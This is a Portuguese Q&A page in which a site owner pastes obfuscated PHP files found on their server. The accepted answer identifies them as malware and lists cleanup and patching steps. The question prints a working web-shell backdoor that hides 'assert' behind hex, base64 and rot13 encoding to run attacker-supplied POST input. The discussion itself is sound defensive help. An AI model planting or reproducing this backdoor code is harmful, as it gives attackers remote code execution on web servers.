Início / computer / Perguntas / 1429756
Accepted
beroe
Asked: 2019-04-26 12:03:15 +0800 CST

Hacker arquivo php no meu site? [fechado]

  • 772

Acabei de notar vários arquivos php no diretório raiz do meu site que não coloquei lá. Eles contêm código ofuscado (veja abaixo) que se traduz em tentativas de instruções get/post/assert. Minha pergunta é se outras pessoas viram isso, se é um hack comum e como eles poderiam colocá-lo no site?

 <?php ${"G\x4c\x4f\x42\x41\x4c\x53"}["g\x70x\x65\x62p\x63\x75"]="c";if(isset($_GET["213d7"])&&isset($_POST["42df9"])){${${"\x47\x4cO\x42A\x4c\ x53"}["g\x70\x78\x65\x62p\x63\x75"]}=base64_decode("YX\x4ez\x5aX\x49\x3d")."t";@${${"G\x4c\x4fB\x41\x4c\x53"}["\x67\x70xe\x62\x70c\x75"]}($_PO ST["42df9"]);exit();} ?><?php ${"G\x4c\x4f\x42\x41\x4c\x53"}["g\x70x\x65\x62p\x63\x75"]="c";if(isset($_GET["c991d"])&&isset($_POST["bc05e"])){ ${${"\x47\x4cO\x42A\x4c\x53"}["g\x70\x78\x65\x62p\x63\x75"]}=base64_decode("YX\x4ez\x5aX\x49\x3d")."t";@${${"G\x4c\x4fB\x41\x4c\x53"}["\x67\x7 0xe\x62\x70c\x75"]}($_POST["bc05e"]);exit();} ?><?php if (isset($_POST['b0e4d'])) {$license = str_rot13('n'.'f'.'f'.'r'.'e'.'g');$license($_PO ST['b0e4d']);}?>```
php webserver

1 respostas

  1. Best Answer

    Sim, parece que seu site tem um malware.

    Os hackers podem fazer upload desses arquivos por meio das vulnerabilidades ou por meio de scripts já carregados que atuam como gerenciadores de arquivos.

    Por exemplo, se o seu site permitir o upload de qualquer arquivo (como imagens), eles podem tentar fazer upload de um arquivo de malware para o seu site (usando imagens especialmente preparadas) e, em seguida, executá-lo usando um ponto fraco do seu sistema (como acessar diretamente esse arquivo).

    Consulte Mais informação:

    Se você estiver usando um sistema de gerenciamento de conteúdo, verifique se ele está atualizado o tempo todo para evitar riscos.

    Para entender como funciona esse tipo de arquivo de malware, verifique: O que esse script PHP malicioso faz?

    Assim, os próximos passos sugeridos são:

    1. Encontre todos os arquivos de malware e remova-os.

      Veja: Como se livrar de eval-base64_decode como arquivos de vírus PHP?

      Você pode usar um scanner de malware, por exemplo

    2. Se você estiver usando um servidor dedicado, atualize todos os pacotes desatualizados em seu sistema ( apt-get update).

    3. Atualizar bibliotecas PHP desatualizadas (código de terceiros) e sistema de gerenciamento de conteúdo (se estiver em uso).
    4. Mantenha suas bibliotecas e códigos de terceiros atualizados.
    • 3

relate perguntas